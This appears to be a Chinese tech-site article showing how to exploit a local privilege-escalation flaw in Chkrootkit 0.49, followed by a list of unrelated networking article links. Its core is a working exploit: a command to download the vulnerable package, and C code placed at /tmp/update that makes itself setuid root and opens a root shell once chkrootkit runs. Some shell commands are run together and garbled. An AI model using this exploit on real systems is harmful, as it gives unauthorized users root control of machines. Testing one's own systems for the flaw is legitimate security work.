安全漏洞:Chkrootkit 0.49 本地提权漏洞的测试方法
我要评论Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧:
可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验:
wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/
./chkrootkit -V
普通用户在 /tmp 目录下新建 update.c(代码实示例如下):
#include <unistd.h>
void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);
}
然后编译好 update ,看下update的文件详情:
执行有漏洞的 chkrootkit :
再来看下 update 已经成功属于 root 组了!
以上就是查看自己 Ckrootkit 0.49 是不是安装的是不是升到最新版了,或者下载有漏洞的版本进行实验的步骤,谢谢阅读,希望能帮到大家,请继续关注脚本之家,我们会努力分享更多优秀的文章。
相关文章
宽带300兆和500兆你们选? 宽带300兆和500兆区别介绍
宽带300兆和500兆你们选?很多朋友搞不清楚什么是宽带带宽,也不知道300M和500M宽带的区别,本期文章结合网络运营商设定的规则,来说说两者的区别2023-03-29
TP-LINK 发布两款 Wi-Fi 7 无线网卡: 第三季度开始上市
TP-LINK 发布两款 Wi-Fi 7 无线网卡,该系列 Wi-Fi 7 无线网卡可选 PCIe 和 USB 两款接口型号,均支持 2.4G +5G 或 5G + 5G MLO 技术,详细请看下文介绍2023-03-27
路由器之间的路由信息在不同路由协议中交换的过程和原则是不同的。交换路由信息的最终目的在于通过路由表找到一条转发IP报文的最佳路径,详细请看下文介绍2023-03-15
小米wifi放大器pro怎么重新设置密码? 小米wifi放大器pro重置技巧
小米wifi放大器pro怎么重新设置密码?小米wifi放大器pro是可以重置密码的,该怎么重置呢?下面我们就来看看小米wifi放大器pro重置技巧2022-12-20
这篇文章主要介绍了专线宽带和普通宽带哪个好 专线宽带和普通宽带区别对比的相关资料,需要的朋友可以参考下,希望对大家有所帮助2022-11-30
无线网卡和随身WiFi哪个好用 无线网卡和随身WiFi区别对比
无线网卡和随身WiFi哪个好用?无线网卡和随身WiFi有什么区别?今天小编给大家带来无线网卡和随身WiFi对比详解,希望对大家有所帮助2022-05-22
小米wifi放大器pro如何连接使用 小米wifi放大器pro连接使用技巧
当我们发现路由器的信号较弱的时候我们就可以使用wifi放大器了,今天小编就来教大家小米wifi放大器pro如何连接使用,一起来看看2022-02-17
hype-v 虚拟机Kali 双网卡配置方法 hype-v 虚拟机Kali 配置
这篇文章主要介绍了hype-v 虚拟机Kali 双网卡配置方法,hype-v 虚拟机Kali 配置步骤,本文通过图文并茂的形式给大家介绍的非常详细,需要的朋友可以参考下2021-12-22- 这篇文章主要介绍了为什么有mac地址还需要有IP地址呢,需要的朋友可以参考下2021-03-25
网卡驱动有以太网卡和无线网卡两种,但是有很多小伙伴不知道以太网卡和无线网卡有什么区别,经常会将两种混为一谈。这里小编就为大家带来关于以太网卡和无线网卡区别介绍2021-03-01
最新评论